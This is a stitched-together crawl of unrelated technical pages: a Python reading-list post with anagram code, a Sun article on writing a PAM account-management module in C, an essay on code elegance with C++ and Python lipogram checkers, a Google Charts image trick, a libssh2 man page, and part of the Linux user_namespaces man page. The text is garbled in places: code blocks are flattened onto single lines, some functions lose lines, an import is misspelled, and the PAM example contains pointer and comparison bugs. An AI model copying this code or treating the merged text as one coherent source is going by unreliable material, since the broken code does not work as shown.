Why? Well, partly because of the speed at which the language progresses. Thus the second edition of the Python Cookbook — the single book I regard as essential — did a great job of being 2.4 compliant before 2.4 was even released, which definitely extended its shelf-life; but it has nothing to say about Python 2.5 features, let alone Python 2.6 and the transition to Python 3.0. And partly because the books all too easily become too thick for comfortable use. Python famously comes with batteries included, but full details of their use belongs online.
I do own a copy of Python Essential Reference by David Beazley. It’s the second edition and is now woefully out of date (covering Python up to version 2.1). I did get good use out of it, though. It’s well designed, beautifully written and laid out, and, weighing in at fewer than 400 pages, comfortable to read and carry. Somehow it manages (managed, I should say) to pack everything in: it’s concise, and it recognises that the online documentation should be the source of authoritative answers. Despite this, I haven’t bought the third edition. Partly because I don’t really need it, partly because it’s now a Python point revision or two out of date, and partly because it’s expanded to 644 pages.
The Reading List, with Links
- The Zen of Python
- Python Tutorial
- Python Library Reference
- Python Reference Manual
- The Python Cookbook
- Code Like a Pythonista: Idiomatic Python
- Functional Programming HOWTO
- Itertools functions
- Python library source code
- What’s New
There’s nothing controversial here. The Zen of Python should whet your appetite, and the next three items are exactly what you’ll find at the top of the Python documentation home page. Others may argue Python in a Nutshell deserves a place, or indeed the hefty Programming Python, and they’re certainly good books.
I’d be more interested to find out which non-Python books have improved your Python programming the most. For myself, I’ll predictably pick Structure and Interpretation of Computer Programs.
The anagrams puzzle comes from Dave Thomas’s CodeKata, a nice collection of programming exercises. The solutions presented here gloss over a few details and make assumptions about the input. Is “face” an anagram of “café”, for example? For that matter, what about “cafe” and “café”. Or “isn’t” and “tins”? What if the word list contains duplicates? These issues aren’t particularly hard to solve but they do highlight the dangers of coding up a solution without fully specifying the problem, and indeed the difference between a “working” solution and a finished one.
However, I just wanted a short program to highlight advances in recent versions of Python, and in that light, here’s another variant. (My thanks to Marius Gedminas for spotting a bug in the code I originally posted here.)
from itertools import groupby, ifilter, imap from operator import itemgetter from string import (ascii_lowercase, ascii_uppercase, punctuation, maketrans, translate) key = sorted second = itemgetter(1) to_lower = maketrans(ascii_uppercase, ascii_lowercase) data = open("wordlist.txt", "rt").read() translated = translate(data, to_lower, deletions=punctuation) words = set(translated.split()) sorted_words = sorted(words, key=key) grouped_words = imap(list, imap(second, groupby(sorted_words, key))) anagrams = ifilter(lambda words: len(words) > 1, grouped_words) | http://wordaligned.org/articles/essential-python-reading-list | crawl-002 | en | refinedweb |
Learn to write PAM (Pluggable Authentication Modules) service modules for authentication and security services, and see an example module.
In the first three articles in this series (Part 1, Part 2, and Part 3) we covered the basics of password-based user authentication, concentrating on the use of PAM (Pluggable Authentication Modules). We described the PAM API that applications (called PAM consumers) use for authentication, and showed how to write PAM conversation functions.
In this fourth, and final, article we'll describe PAM service modules and show an example of how to write them. the PAM configuration file, /etc/pam.conf. We described PAM configuration files in Part 2 of this series.
/etc/pam.conf
We mentioned in Part 2 of this series that PAM consumers call one or more of the following functions to perform user authentication and related functions:
pam_authenticate
pam_acct_mgmt
pam_setcred
pam_open_session
pam_close_session
pam_chauthtok
Each of these functions is implemented in service modules by functions having the same name, except that the pam_ prefix is replaced with pam_sm_. So, pam_authenticate is implemented by pam_sm_authenticate, pam_sm_acct_mgmt implements pam_acct_mgmt, and so on. Service modules that we write must provide one or more of these functions.
pam_
pam_sm_
pam_sm_authenticate
pam_sm_acct_mgmt
To communicate with PAM consumer applications, service modules use the pam_get_item and pam_set_item functions, as shown in the following code example. (We should also point out that PAM consumers can use these functions to communicate with service modules.)
pam_get_item
pam_set_item
#include <security/pam_appl.h>
int pam_get_item(const pam_handle_t *pamh, int item_type,
void **item);
int pam_set_item(pam_handle_t *pamh, int item_type,
const void *item);
The pam_set_item function enables service modules to update information for the PAM transaction specified by the handle, pamh. The information type, specified by item_type, can be one of about a dozen specified in the pam_set_item man page. Examples of item types include PAM_AUTHTOK, PAM_CONV, PAM_USER, and PAM_USER_PROMPT. The value we want to set the PAM information to is specified by item.
PAM_AUTHTOK
PAM_CONV
PAM_USER
PAM_USER_PROMPT
Similarly, the information for a PAM transaction can be accessed by calling pam_get_item. In this case, a pointer to the PAM information of the specified type is placed into item.
Service modules can access and update module-specific information using the pam_get_data and pam_set_data functions. We won't discuss these functions further because we're focusing on communications between PAM service modules and their consumers. Interested readers are referred to these functions' man pages for more details.
pam_get_data
pam_set_data
PAM service modules must provide a PAM return code to their consumer. This return code must be one of three types:
PAM_SUCCESS
PAM_IGNORE
PAM_<error>
PAM_USER_UNKNOWN
PAM_PERM_DENIED
To prevent the display of unwanted messages, all service modules must honour the PAM_SILENT flag. We recommend the use of the debug flag to enable the logging of diagnostic debugging information via the syslog facility. Debugging messages logged using syslog should use the LOG_AUTH facility and LOG_DEBUG severity level. Any other messages logged using syslog should use the LOG_AUTH facility with an appropriate priority level.
PAM_SILENT
debug
syslog
LOG_AUTH
LOG_DEBUG
Important: The syslog-related functions openlog, closelog, and setlogmask must not be used in service modules because they interfere with the application's settings.
openlog
closelog
setlogmask
Now that we've described service modules and what they must do, let's have a look at one. The service module we write provides a mechanism by which named users in a certain group are denied access. An example of where this could be useful would be a web hosting company: customers are allowed to connect via ftp and sftp, but login shells are forbidden. This access policy can be enforced by using this module and naming the customers in the forbidden group.
ftp
sftp
This type of account access policy is applied to users who have successfully authenticated, so it could be characterized as account management. PAM-aware applications call pam_acct_mgmt to perform this task, so our example module implements pam_sm_acct_mgmt, which has the following prototype:
#include <security/pam_appl.h>
#include <security/pam_modules.h>
int pam_sm_acct_mgmt (pam_handle_t *pamh, int flags, int argc,
const char **argv);
The PAM handle returned by pam_start is referenced by pamh, flags contains any flags passed to the module by the application, and argc and argv contain the number of module options specified in pam.conf and the list of options respectively.
pam_start
pam.conf
Here's the source code to our example module.
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <grp.h>
4 #include <string.h>
5 #include <syslog.h>
6 #include <security/pam_appl.h>
7 int pam_sm_acct_mgmt (pam_handle_t *ph, int flags, int argc, char **argv)
8 {
9 char *user = NULL;
10 char *host = NULL;
11 char *service = NULL;
12 char *denied_group = "";
13 char group_buf[8192];
14 struct group grp;
15 struct pam_conv *conversation;
16 struct pam_message msg;
17 struct pam_message *msgp = &msg;
18 struct pam_response *resp = NULL;
19 int i;
20 int err;
21 int no_warn = 0;
22 int debug = 0;
23 int ret_val;
24 for (i = 0; i < argc; i++) {
25 if (strcasecmp (argv[i], "nowarn") == 0)
26 no_warn = 1;
27 else if (strcasecmp (argv[i], "debug") == 0)
28 debug = 1;
29 else if (strncmp (argv[i], "group=", 6) == 0)
30 denied_group = &argv[i][6];
31 }
32 if (flags & PAM_SILENT)
33 no_warn = 1;
34 pam_get_user (ph, &user, NULL);
35 pam_get_item (ph, PAM_SERVICE, (void **)&service);
36 pam_get_item (ph, PAM_RHOST, (void **)&host);
37 if (user == NULL) {
38 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: user not set", service);
39 ret_val = PAM_USER_UNKNOWN;
40 goto out;
41 }
42 if (host == NULL)
43 host = "unknown";
44 if (getgrnam_r (denied_group, &grp, group_buf, sizeof (group_buf)) == NULL) {
45 syslog (LOG_AUTH | LOG_NOTICE, "%s: denied_group: group \"%s\" not defined",
46 service, denied_group);
47 ret_val = PAM_SYSTEM_ERR;
48 goto out;
49 }
50 if (grp.gr_mem[0] == '\0') {
51 if (debug)
52 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: group \"%s\" is empty: "
53 "all users allowed", service, grp.gr_name);
54 ret_val = PAM_IGNORE;
55 goto out;
56 }
57 for (; grp.gr_mem[0]; grp.gr_mem++) {
58 if (strcmp (grp.gr_mem[0], user) == 0) {
59 msg.msg_style = PAM_ERROR_MSG;
60 msg.msg = "Access denied: you are not on the access list for this host.";
61 pam_get_item (ph, PAM_CONV, (void **)&conversation);
62 if ((no_warn == 0) && (conversation != NULL)) {
63 err = conversation->conv (1, &msgp, &resp, conversation->appdata_ptr);
64 if (debug && err != PAM_SUCCESS) {
65 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: conversation returned %s",
66 service, pam_strerror (ph, err));
67 }
68 if (resp != NULL) {
69 if (resp->resp)
70 free (resp->resp);
71 free (resp);
72 }
73 }
74 syslog (LOG_AUTH | LOG_NOTICE, "%s: denied_group: Connection for %s "
75 "not allowed from %s", service, user, host);
76 ret_val = PAM_PERM_DENIED;
77 goto out;
78 }
79 }
80 if (debug)
81 syslog (LOG_AUTH | LOG_DEBUG, "%s: denied_group: user %s is not a member of "
82 "group %s. Access granted.", service, user, grp.gr_name);
83
84 ret_val = PAM_SUCCESS;
85 out:
86 return (ret_val);
87 }
Let's take a closer look at this 80-line function. Note that for the sake of this example, we've arbitrarily limited the buffer group_buf (defined on line 13) to 8K characters. In a real program we'd probably dynamically size this buffer depending on the maximum system value, as determined by calling sysconf.
group_buf
sysconf
1-6:Include the required header files.
1-6:
24-33:Interpret the module options, setting the debug and no warnings flags as appropriate.
24-33:
34-36:Get the user, service, and remote host names.
34-36:
37-41:Deny access if the user isn't specified.
37-41:
44-49:Deny access if the specified group isn't defined.
44-49:
50-56:Allow access for all users if the specified group has no named members.
50-56:
57-79:Check to see if the user is a member of the group. If so, deny access, and (if warnings aren't disabled) call the conversation function to pass the appropriate error message back to the user. Note that the denial is always reported to syslog. Note that for brevity we've used strcmp to compare the user names. In a real application we'd probably use strncmp to avoid buffer overflows. Notice also our use of pam_strerror on line 66. This function returns the error message associated with its second argument, in much the same manner as strerror does for regular error messages.
57-79:
strcmp
strncmp
pam_strerror
strerror
80-84:If we get here, the user is not a member of the specified group so access is granted.
80-84:
85-87:Return to the caller.
85-87:
Service modules are shared objects, so we use the following command to build our example with Sun's Studio compiler.
rich@ultra20# cc -c -Kpic -o pam_service_module.so pam_service_module.c
(Users of gcc should replace -Kpic with -fpic.)
gcc
-Kpic
-fpic
The PAM infrastructure performs various security checks, so our shared object must be owned by root, as shown in the following example.
root
rich@ultra20# su -
root@ultra20# chown root:root /home/rich/pam_service_module.so
When we've finished testing our service module and are ready to deploy it, we would normally place the shared object in /usr/lib/security/$ISA, where $ISA represents the instructions set of the target machine. Another place we might install our own modules (if we provide them in package format) is /opt/lib/security/$ISA.
/usr/lib/security/$ISA
$ISA
/opt/lib/security/$ISA
Finally, we need to add an entry for our new module to pam.conf, as shown here.
other account required /home/rich/pam_service_module.so group=staff debug
All being well, named members of the group staff will be denied access. With the user rich being named as a member of the group staff, trying to log in using ssh fails, as shown in the following example. (Using telnet will also fail, but security-conscious people shouldn't use telnet.)
staff
rich
ssh
telnet
rich@sunblade1000# ssh ultra20
Connection closed by 192.168.0.2
Changing the denied group (to root, for example) allows the user rich to log in, as shown here.
rich@sunblade1000# ssh ultra20
Last login: Sun Dec 2 16:43:05 2007 from sunblade1000
Sun Microsystems Inc. SunOS 5.11 snv_70 October 2007
rich@ultra20#
Removing the user rich from the member list of the group named staff has the same effect.
In this article we described what PAM service modules are, and what they must do (that is, what is expected of a service module). We stated that service modules must implement one or more of the following functions, depending on what the service module is to do: pam_sm_authenticate, pam_sm_acct_mgmt, pam_sm_setcred, pam_sm_open_session, pam_sm_close_session, and pam_sm_chauthtok. We also briefly described the two functions that service modules and PAM consumers use to communicate with each other.
pam_sm_setcred
pam_sm_open_session
pam_sm_close_session
pam_sm_chauthtok
We then described the three types of values that service modules must return to their caller, which indicate that the request was successful, ignored, or resulted in an error (including failure).
After discussing the types of logging a service module is expected to do, and when not to log certain messages, we showed an example service module that implements a policy of denying access to named members of the specified group.
Finally, we showed how to build and install. | http://developers.sun.com/solaris/articles/user_auth_solaris4/index.html | crawl-002 | en | refinedweb |
Elegance and Efficiency
Contents
Elegant code is often efficient. Think of the heap data structure, for example, which always remains exactly as sorted as it needs to be, making it perfect for modelling priority queues. It’s both elegant and efficient — and dazzlingly so.
This article discusses the relationship between elegance and efficiency in more depth, and asks the question: Can inefficient code ever be elegant?
What is Elegant Code?
First, we should consider what’s meant by “elegant code”.
Anthony Williams discusses this very subject in a recent blog post (which is what got me thinking about it in the first place). Up front he admits the search for elegance is subjective and that the factors he lists are all “my opinion”. He also points out his list is not exhaustive. Nonetheless, it’s a good starting point, and I’d like to build on it. Let’s start by summarising his list here.
Factors affecting the elegance of software
- Does it work?
- Is it easy to understand?
- Is it efficient?
- Short functions
- Good naming
- Clear division of responsibility
- High cohesion
- Low coupling
- Appropriate use of OO and other techniques
- Minimal code
Appearance
I’m not sure this list completely nails elegance. For a start, there’s no mention of appearance — the way the code actually looks, on screen, or in print — which in my opinion is fundamental. Elegant code looks clean, balanced, self-consistent.
That’s one of the reasons I like Python: it’s hard to get away with poorly laid out code. Scheme, with its minimal syntax, also wins here. Java stands a good chance of doing well on this front too, thanks to a clearly stated set of coding conventions and excellent IDE support for applying these conventions.
Use of standard libraries
I’d also say that appropriate and even cunning use of the language’s standard libraries can add to code’s elegance. Williams hints at this with his mention of Minimal Code, though minimalism covers many other things.
As an example, if you’re using C++, you should take the time to become familiar with the standard library, and use it whenever possible. It works. It’s efficient. In fact it embodies pretty much everything Williams lists, with a few notable exceptions (no one could describe
std::string as minimal, and
std::auto_ptr is notoriously slippery). Use the standard library and you’ll save yourself code and time, and your own code will be the more elegant for it.
Planar vectors in Scheme
Let’s return to Scheme to illustrate my point about cunning use of standard libraries and consider exercise 2.46 from the Wizard Book..
An obvious solution would be to model the 2-D vector as a pair.
(define make-vect cons) (define xcor-vect car) (define ycor-vect cdr) (define (add-vect v w) (make-vect (+ (xcor-vect v) (xcor-vect w)) (+ (ycor-vect v) (ycor-vect w)))) (define (sub-vect v w) (make-vect (- (xcor-vect v) (xcor-vect w)) (- (ycor-vect v) (ycor-vect w)))) (define (scale-vect s v) (make-vect (* s (xcor-vect v)) (* s (ycor-vect v))))
An elegant alternative builds on Scheme’s support for complex numbers.
;; represent 2-D vect using a complex number (define make-vect make-rectangular) (define xcor-vect real-part) (define ycor-vect imag-part) (define add-vect +) (define sub-vect -) (define scale-vect *) ;; some other vector operations come for free (define magnitude-vect magnitude) (define make-vect-from-polar-coords make-polar) (define angle-vect angle)
Minimalism and Simplicity
Elegance and beauty are not the same, though perhaps elegant forms a subset of beautiful. Elegance carries the additional connotation of simplicity, which itself correlates with minimalism. If I were forced to select the single item from Williams’ list most closely aligned to elegance, I’d go for minimalism: allowed my own choice, it would be simplicity.
Williams notes a couple of ways you can remove to improve:
- avoid unnecessary layering
- eliminate duplication
We’ve already added:
- use standard libraries
Kevlin Henney gives minimalism more careful attention in a series of articles. Omit Needless Code promotes:
Code that is simple and clear, brief and direct.
Henney illustrates his points with some elegant examples which reinforce my own claims about the C++ standard library.
Efficiency and Elegance?
Efficiency comes high on Williams’ list, right after correctness, which shouldn’t be a surprise to anyone who writes code for a living. Surely code which doesn’t run fast enough is about as useful as code which doesn’t work? You could even note that efficiency is yet another aspect of minimalism: in this case, it’s the machine’s resource consumption you’d like to reduce.
I’m not convinced, though. It’s true, many of the most elegant algorithms happen to be efficient too — and may even have arisen from the quest for efficiency. Thus the standard quicksort algorithm has virtually no space overhead, and as a general purpose sorting algorithm, really can’t be beaten. Similarly the heap, as already mentioned, is a lean clean implementation of a priority queue. But I don’t think elegance implies efficiency. I’d even suggest that something could be elegant but of no practical use, at least not on today’s hardware.
The downside of efficiency is that it can be at odds with simplicity and minimalism. Consider the sad fate of
boost::lexical_cast, a general purpose conversion function. If I go back to early Boost releases I find code which reads like this.
template<typename Target, typename Source> Target lexical_cast(Source arg) { # ifndef BOOST_NO_STRINGSTREAM std::stringstream interpreter; # else std::strstream interpreter; // for out-of-the-box g++ 2.95.2 # endif Target result; if(!(interpreter << arg) || !(interpreter >> result) || !(interpreter >> std::ws).eof()) throw bad_lexical_cast(); return result; }
For brevity I’ve omitted file headers, include guards and the unexceptional definition of
boost::bad_lexical_cast. Even with these present, the file runs to just 68 lines long, and provides an elegant example of what generic C++ code can do. The body of
lexical_cast itself is a readable one-liner, tainted only by a preprocessor workaround for non-compliant compilers.
Wind forwards to 2007, and this small stain has spread across the entire library, which, after tuning for correctness, portability and efficiency now weighs in at well over 1K lines of code. Here’s a flavour of the latest greatest
lexical_cast, which is far too long to include in its entirety.
namespace detail // lcast_put_unsigned { // I'd personally put lcast_put_unsigned in .cpp file if not // boost practice for header-only libraries (Alexander Nasonov). template<typename T, typename CharT> CharT* lcast_put_unsigned(T n, CharT* finish) { CharT thousands_sep = 0; #ifdef BOOST_LEXICAL_CAST_ASSUME_C_LOCALE char const* grouping = ""; std::size_t const grouping_size = 0; #else std::locale loc; typedef std::numpunct<CharT> numpunct; numpunct const& np = BOOST_USE_FACET(numpunct, loc); std::string const& grouping = np.grouping(); std::string::size_type const grouping_size = grouping.size(); if(grouping_size) thousands_sep = np.thousands_sep(); #endif std::string::size_type group = 0; // current group number char last_grp_size = grouping[0] <= 0 ? CHAR_MAX : grouping[0]; // a) Since grouping is const, grouping[grouping.size()] returns 0. // b) It's safe to assume here and below that CHAR_MAX // is equivalent to unlimited grouping: #ifndef BOOST_NO_LIMITS_COMPILE_TIME_CONSTANTS BOOST_STATIC_ASSERT(std::numeric_limits<T>::digits10 < CHAR_MAX); #endif char left = last_grp_size; do { if(left == 0) { ++group; if(group < grouping_size) { char const grp_size = grouping[group]; last_grp_size = grp_size <= 0 ? CHAR_MAX : grp_size; } left = last_grp_size; --finish; *finish = thousands_sep; } --left; --finish; int const digit = static_cast<int>(n % 10); int const cdigit = digit + lcast_char_constants<CharT>::zero; *finish = static_cast<char>(cdigit); n /= 10; } while(n); return finish; } }
I’m not saying that the changes to
boost::lexical_cast are bad: after all, users of the library get software which does the right thing more often and more quickly — all without any client-side changes. That’s one of the benefits of using a layered software stack. Rather, I present this as an example of the tension between efficiency and elegance. Somewhere along the line, an elegant piece of code got buried.
It’s also interesting that, in this case, even “does-it-work” counteracts elegance. We noted that
boost::lexical_cast@v1.22 became tainted in its eagerness to work with legacy compilers. The current version makes far greater concessions. It’s a reminder — as if any were needed — that we programmers have to keep our feet on the ground and aim for pragmatic solutions. Perfection is rarely possible, elegance occasional.
Elegance and Inefficiency?
We’ve demonstrated the tension between elegance and efficiency, but could blatantly inefficient code ever claim to be elegant? The original elegant implementation of
lexical_cast may not have been optimally tuned for all possible inputs (it’s meant to be generic code, after all), but it could hardly be described as inefficient.
We’re going to develop some code which I’ll claim is elegant despite being inefficient. To get us started, let’s consider another problem we can skin in more than one way: how do we determine if a book forms a lipogram? (A lipogram is a piece of text written avoiding the use of a particular character, the letter E for example, and full length books really have been written — and even translated — which adhere to this constraint.)
We’ll pose the problem in C++. Here’s the function prototype.
#include <string> #include <vector> typedef std::string word; typedef std::vector<word> book; // Return true if the input text avoids using any characters // in 'avoid', false otherwise. // Example call: // bool const lipo = is_lipogram(text, "Ee"); bool is_lipogram(book const & text, word const & avoid);
What we have here might be seen as a loop within a loop within a loop: for each word in the book, for each character in that word, check against each character in the string of characters to be avoided. A match against an avoided character means we know our book isn’t a lipogram, and we can return false; but if we reach the end of our book without such a match, we can return true.
is_lipogram1
We can code this up:
typedef word::const_iterator word_iter; typedef book::const_iterator book_iter; bool is_lipogram; }
This painstaking chunk of code reads like a direct transcription of the way an unfortunate human proof-reader might approach the task, one finger tracking through the text, word by word, character by character, another finger repeatedly working through the characters to be avoided. It fails the elegance test on a number of counts:
- Not minimal. The edge cases do not merit special treatment. Normal processing of the (nested) main loop handles empty inputs just fine.
- Failure to use the standard library. The
std::stringclass is big enough to support searches for characters in a string directly, allowing us to remove a couple of layers of nesting.
- Clumsy. The function has four separate exit points.
Perhaps none of these charges seem too bad in such a small function, but small functions have a tendency to grow into larger ones, and flaws, in particular, scale rapidly.
is_lipogram2 & 3
Here’s a standard-library-aware improvement.
bool is_lipogram(book const & text, word const & avoid) { for (book_iter w = text.begin(); w != text.end(); ++w) { if (w->find_first_of(avoid) != std::string::npos) { return false; } } return true; }
Many programmers would leave it at that, but I still prefer to re-cast this particular variant as follows:
bool is_lipogram(book const & text, word const & avoid) { book_iter w = text.begin(); while (w != text.end() && w->find_first_of(avoid) == std::string::npos) { ++w; } return w == text.end(); }
Rather than exit as soon as we detect a character in the
avoid string, we keep reading as long as there’s text to read and we’ve avoided such characters. There’s not much in it, especially in such a small function, but my preference is to simplify the control flow.
is_lipogram4
We can remove the explicit iteration from our code by using the
std::find_if algorithm, which accepts a predicate. In this case we want to find the first word which isn’t itself a lipogram. Combining the
std::not1 function adaptor with a hand-written class deriving from
std::unary_function<std::string const, bool> does the job.
This code demonstrates proper use of the STL predicates and adaptors, but it also reaches the limits of my personal comfort zone for using C++ in a functional programming style. The price paid for avoiding explicit iteration is just too high; clever though this code may be, I don’t find it elegant.
When I first coded up
lipogram_word_tester, it derived from
std::unary_function<word const &, bool>. This turns out to be wrong, or at least, it failed to compile with a typically cryptic diagnostic, and I’m still not sure why!
// Simple functor for use in lipogram algorithms class lipogram_word_tester: public std::unary_function<word(book const & text, word const & avoid) { lipogram_word_tester const word_test(avoid); return find_if(text.begin(), text.end(), not1(word_test)) == text.end(); }
is_lipogram5
I would expect all four functions presented so far to be similarly efficient in terms of memory, stack, CPU cycles.
A recursive solution may require more stack: it depends on the compiler. We’ve now got two functions, and although each comprises just a single expression, the expression forming the body of the recursive helper function,
is_lipo(), is tricky. I wouldn’t recommend this implementation.
bool is_lipo(book_iter wb, book_iter we, word const & avoid) { return wb == we || wb->find_first_of(avoid) == std::string::npos && is_lipo(++wb, we, avoid); } bool is_lipogram(book const & text, word const & avoid) { return is_lipo(text.begin(), text.end(), avoid); }
is_lipogram6
Our final alternative is a clear winner on the three fronts which led us to reject our original implementation: it’s brief, it leans heavily on the standard library, it has just a single exit point — in fact, is just a single expression.
bool is_lipogram(book const & text, word const & avoid) { return accumulate(text.begin(), text.end(), std::string() ).find_first_of(avoid) == std::string::npos; }
Does it qualify as elegant? I’d say so, yes. Sadly, though, its inefficiency rules it out as a heavy-duty lipogram checker. The
std::string class is not designed for repeated addition — which is what
std::accumulate does.
Winding Up
Actually none of the C++ lipogram checkers are much use, except in the case when we’re certain our book is written in 7-bit ASCII. A lipogram which avoids the letter E should also avoid its various accented forms: é, è, ê, ë, É, È, Ê, Ë, …
A heavy-duty lipogram checker needs to work in Unicode and, for C++ at least, will have to establish some ground rules for input encoding schemes. The current C++ standard (C++98) has little to say about Unicode. We’d be better off using a more Unicode aware language, such as Java.
Python allows us to create a character stream which accumulates all the characters in all the words, but yields them lazily. The function below uses
itertools.chain to flatten the input words (which themselves may be a stream or an in-memory collection) into a character stream. The built-in
all function reads exactly as far into this stream as it needs to. In other words, we’ve got a Python counterpart to our final C++ algorithm which is both efficient (efficient for Python that is!) and equally happy with Unicode and ASCII.
import iterools def is_lipogram(words, avoid): return all(ch not in avoid for ch in itertools.chain(*words))
C++ Source Code
#include <cassert> #include <functional> #include <iostream> #include <numeric> #include <set> #include <string> #include <vector> namespace { typedef std::string word; typedef word::const_iterator word_iter; typedef std::vector<word> book; typedef book::const_iterator book_iter; typedef bool (* lipo_fn)(book const &, word const &); // Return true if the input text avoids using any characters // in 'avoid', false otherwise. bool is_lipogram1; } bool is_lipogram2(book const & text, word const & avoid) { for (book_iter w = text.begin(); w != text.end(); ++w) { if (w->find_first_of(avoid) != std::string::npos) { return false; } } return true; } bool is_lipogram3(book const & text, word const & avoid) { book_iter w = text.begin(); while (w != text.end() && w->find_first_of(avoid) == std::string::npos) { ++w; } return w == text.end(); } // Simple functor for use in lipogram algorithms class lipogram_word_tester: public std::unary_function<std::string4(book const & text, word const & avoid) { lipogram_word_tester const word_test(avoid); return find_if(text.begin(), text.end(), not1(word_test)) == text.end(); } bool is_lipo5(book_iter wb, book_iter we, word const & avoid) { return wb == we || wb->find_first_of(avoid) == std::string::npos && is_lipo5(++wb, we, avoid); } bool is_lipogram5(book const & text, word const & avoid) { return is_lipo5(text.begin(), text.end(), avoid); } bool is_lipogram6(book const & text, word const & avoid) { return accumulate(text.begin(), text.end(), std::string() ).find_first_of(avoid) == std::string::npos; } void read_book(book & text, std::istream & input) { typedef std::istream_iterator<word> in; std::copy(in(input), in(), back_inserter(text)); } // Function-like class used for lipo_fn evaluation. class lipo_functor { public: // Construct an instance of this class, caching lipo_fn parameters. lipo_functor(book const & text, word const & avoid) : text(text) , avoid(avoid) { } // Return the result of applying is_lipo to the cached parameters. bool operator()(lipo_fn is_lipo) { return is_lipo(text, avoid); } private: book const & text; word const & avoid; }; void check_if_lipogram(std::ostream & report, book const & text, word const & avoid) { typedef std::set<bool> answers; lipo_fn const lipo_fns[] = { is_lipogram1, is_lipogram2, is_lipogram3, is_lipogram4, is_lipogram5, is_lipogram6, }; lipo_functor lipo_func(text, avoid); answers results; lipo_fn const * const end = lipo_fns + sizeof lipo_fns / sizeof *lipo_fns; transform(lipo_fns, end, inserter(results, results.end()), lipo_func); assert(results.size() == 1); report << "Is " << (*results.begin() ? "" : "not ") << "a lipogram" << '\n'; } } // end anonymous namespace int main() { book text; word const avoid = "Ee"; read_book(text, std::cin); check_if_lipogram(std::cout, text, avoid); return 0; } | http://wordaligned.org/articles/elegance-and-efficiency | crawl-002 | en | refinedweb |
Scatter pictures with Google Charts
In a recent post on his blog Matt Cutts asks:
I almost wanted to call this post “Stupid Google Tricks” :-) What fun diagrams can you imagine making with the Google Charts Service?
Here’s a stupid trick: you can use the Python Imaging Library to convert a picture into a URL which Google charts will render as the original picture.
Here’s the original picture:
here’s the version served up by Google charts:
here’s the code:
import Image import string def scatter_pixels(img_file): """Return the URL of a scatter plot of the supplied image The image will be rendered square and black on white. Adapt the code if you want something else. """ # Use simple chart encoding. To make things really simple # use a square image where each X or Y position corresponds # to a single encode value. simple = string.uppercase + string.lowercase + string.digits rsimple = simple[::-1] # Google charts Y reverses PIL Y w = len(simple) W = w * 3 img = Image.open(img_file).resize((w, w)).convert("1") pels = img.load() black_pels = [(x, y) for x in range(w) for y in range(w) if pels[x, y] == 0] xs = "".join(simple[x] for x, _ in black_pels) ys = "".join(rsimple[y] for _, y in black_pels) sqside = 3.0 return ( "?" "cht=s&" # Draw a scatter graph "chd=s:%(xs)s,%(ys)s&" # using simple encoding and "chm=s,000000,1,2.0,%(sqside)r,0&"# square black markers "chs=%(W)rx%(W)r" # at this size. ) % locals()
and here’s the url it generates:…&chs=186x186
Smallprint. Google charts may return a 400 error for an image with a long URL (meaning lots of black pixels in this case). The upper limit on URL length doesn’t seem to be documented but a quick trawl through topics on the google charts group suggests others have bumped into it too. Connoisseurs of whacky pictures should pay CSS Homer Simpson a visit. | http://wordaligned.org/articles/scatter-pictures-with-google-charts | crawl-002 | en | refinedweb |
libssh2_session_callback_set - set a callback function
Synopsis
Description
Callback Types
Return Value
See Also
#include <libssh2.h>
void *libssh2_session_callback_set(LIBSSH2_SESSION *session, int cbtype, void *callback);
Sets a custom callback handler for a previously initialized session object. Callbacks are triggered by the receipt of special packets at the Transport layer. To disable a callback, set it to NULL.
session - Session instance as returned by libssh2_session_init_ex(3)
cbtype - Callback type. One of the types listed in Callback Types.
callback - Pointer to custom callback function. The prototype for this function must match the associated callback declaration macro.
Pointer to previous callback handler. Returns NULL if no prior callback handler was set or the callback type was unknown.
libssh2_session_init_ex(3) | http://manpages.sgvulcan.com/libssh2_session_callback_set.3.php | CC-MAIN-2017-47 | en | refinedweb |
NAME
user_namespaces − overview of Linux user namespaces
DESCRIPTION).
Capabilities)). Consequently, unless the process has a user ID of 0 within the namespace, or the executable file has a nonempty inheritable capabilities mask, the process.
The rules for determining whether or not a process has a capability in a particular user namespace are as follows: associated with a process’s mount namespace allows that process to create bind mounts and mount the
When:
a) −1 value) unmapped. This is deliberate: (uid_t) −1 is used in several interfaces (e.g., setreuid(2)) as a way to specify "no user ID". Leaving (uid_t) −1:
Writes that violate the above rules fail with the error EINVAL.
In order for a process to write to the /proc/[pid]/uid_map (/proc/[pid]/gid_map) file, all of the following requirements must be met:
*
+
+
Writes that violate the above rules fail with the error EPERM.
Interaction
with system calls that change process UIDs or GIDs
The transition only−−−rwx".(2) (−1 TO
Namespaces are a Linux-specific feature.
NOTES
Over
Use.12 added support the last of the unsupported major filesystems, XFS.
EXAMPLE
The −rs # Need Linux 3.8 or later
Linux 3.8.0
$ id −u # Running as unprivileged user
1000
$ id −g
1000
Now start a new shell in new user (−U), mount (−m), and PID (−p) namespaces, with user ID (−M) and group ID (−G) 1000 mapped to 0 inside the user namespace:
$ ./userns_child_exec −p −m −U −M ’0 1000 1’ −G −t proc proc /proc
bash$ ps ax
PID TTY STAT TIME COMMAND 1 pts/3 S 0:00 bash 22 pts/3 R+ 0:00 ps ax−handling("−i New IPC namespace\n"); fpe("−m New mount namespace\n"); fpe("−n New network namespace\n"); fpe("−p New PID namespace\n"); fpe("−u New UTS namespace\n"); fpe("−U New user namespace\n"); fpe("−M uid_map Specify UID map for user namespace\n"); fpe("−G gid_map Specify GID map for user namespace\n"); fpe("−z Map user's UID and GID to 0 in user namespace\n"); fpe(" (equivalent to: −M '0 <uid> 1' −G '0 <gid> 1')\n"); fpe("−v Display verbose messages\n"); fpe("\n"); fpe("If −z, −M, or −G is specified, −U is required.\n"); fpe("It is not permitted to specify both −z and either −M or −G.\n"); fpe("\n"); fpe("Map strings for −M and −G consist of records of the form:\n"); fpe("\n"); fpe(" ID−inside−ns ID−outside−ns−delimited records of the form: ID_inside−ns ID−outside−ns length Requiring the user to supply a string that contains newlines is of course inconvenient for command−line == −1) { == −1) { /*)) == −1)−>pipe_fd[1]); /* Close our descriptor for the write end of the pipe so that we see EOF when parent closes its descriptor */ if (read(args−>pipe_fd[0], &ch, 1) != 0) { fprintf(stderr, "Failure in child: read from pipe returned != 0\n"); exit(EXIT_FAILURE); } close(args−>pipe_fd[0]); /* Execute a shell command */ printf("About to exec %s\n", args−>argv[0]); execvp(args−>argv[0], args−−line options. The initial '+' character in the 